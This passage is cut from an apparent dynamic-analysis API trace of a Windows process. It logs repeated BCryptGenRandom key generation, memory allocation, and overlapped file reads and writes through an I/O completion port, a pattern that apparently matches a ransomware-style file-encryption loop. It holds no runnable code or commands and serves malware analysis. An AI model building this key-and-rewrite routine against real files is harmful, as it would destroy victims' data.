(_Block=0x77d908) [0087.600] WriteFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0087.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.611] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.611] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0087.611] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.612] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0087.612] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.612] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.612] free (_Block=0x77d800) [0087.612] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.612] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.613] free (_Block=0x1ff1930) [0087.613] free (_Block=0x1ff1a40) [0087.613] free (_Block=0x77d908) [0087.613] WriteFile (in: hFile=0x3a0, lpBuffer=0x3e300ac, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 0x0 [0087.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.618] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0087.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0087.619] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.619] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.619] free (_Block=0x77d800) [0087.619] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.619] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.620] free (_Block=0x1ff1930) [0087.620] free (_Block=0x1ff1a40) [0087.620] free (_Block=0x77d908) [0087.620] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.620] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.633] CloseHandle (hObject=0x3c0) returned 1 [0087.633] free (_Block=0x1ff1e60) [0087.633] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.840] CloseHandle (hObject=0x3b8) returned 1 [0087.840] free (_Block=0x1fb18c0) [0087.840] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.858] CloseHandle (hObject=0x3c4) returned 1 [0087.859] free (_Block=0x1ff1e60) [0087.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.878] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0087.878] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.883] CloseHandle (hObject=0x3c8) returned 1 [0087.887] free (_Block=0x3e70008) [0087.887] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.887] WriteFile (in: hFile=0x3ac, lpBuffer=0x3eb00ac*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3eb0078 | out: lpBuffer=0x3eb00ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3eb0078) returned 1 [0087.887] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.892] CloseHandle (hObject=0x3b8) returned 1 [0087.893] free (_Block=0x1fb18c0) [0087.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.900] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0087.900] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.900] CloseHandle (hObject=0x3a0) returned 1 [0087.903] free (_Block=0x3d70048) [0087.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.909] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x17719, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0087.910] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.931] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xb30, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.931] CloseHandle (hObject=0x3c4) returned 1 [0087.936] free (_Block=0x1fb18c0) [0087.936] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0087.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0087.951] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0087.951] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0087.951] free (_Block=0x1ff1e60) [0087.951] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0087.951] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0087.952] free (_Block=0x1ff1e60) [0087.952] free (_Block=0x1ff1930) [0087.952] free (_Block=0x77d800) [0087.952] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.952] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.953] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.953] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.971] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xbd6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.971] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.972] CloseHandle (hObject=0x3c4) returned 1 [0087.976] free (_Block=0x1fb18c0) [0087.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0087.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0087.990] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0087.990] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0087.990] free (_Block=0x1ff1e60) [0087.990] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0087.990] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0087.991] free (_Block=0x1ff1e60) [0087.991] free (_Block=0x1ff1930) [0087.991] free (_Block=0x77d800) [0087.991] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.991] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0087.992] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.992] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.086] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0088.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.087] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0088.087] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0088.087] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0088.087] free (_Block=0x1ff1e60) [0088.087] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0088.087] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0088.088] free (_Block=0x1ff1e60) [0088.088] free (_Block=0x1ff1930) [0088.088] free (_Block=0x77d800) [0088.088] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0088.088] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.089] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0088.089] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.109] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x1302, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0088.111] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.112] CloseHandle (hObject=0x3a0) returned 1 [0088.113] free (_Block=0x3d70048) [0088.113] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.125] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0088.126] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.126] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0088.127] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0088.127] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0088.127] free (_Block=0x1ff1e60) [0088.127] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0088.127] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0088.127] free (_Block=0x1ff1e60) [0088.127] free (_Block=0x1ff1930) [0088.127] free (_Block=0x77d800) [0088.127] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0088.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.128] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0088.128] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.143] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x4aa8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0088.144] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.144] CloseHandle (hObject=0x3a0) returned 1 [0088.148] free (_Block=0x3d70048) [0088.148] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.173] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x1917, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0088.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.176] CloseHandle (hObject=0x3a0) returned 1 [0088.181] free (_Block=0x3d70048) [0088.181] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.195] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.196] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0088.196] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.197] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0088.197] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0088.197] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0088.197] free (_Block=0x1ff1e60) [0088.197] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0088.197] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0088.198] free (_Block=0x1ff1e60) [0088.198] free (_Block=0x1ff1930) [0088.198] free (_Block=0x77d800) [0088.198] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0088.198] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.216] WriteFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x29700, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0088.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.329] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xb5e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0088.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.362] ReadFile (in: hFile=0x3ac, lpBuffer=0x2031f04, nNumberOfBytesToRead=0xba2, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0088.362] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.363] CloseHandle (hObject=0x3ac) returned 1 [0088.373] free (_Block=0x2031ed0) [0088.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0088.774] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0088.776] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.777] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0088.777] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0088.777] 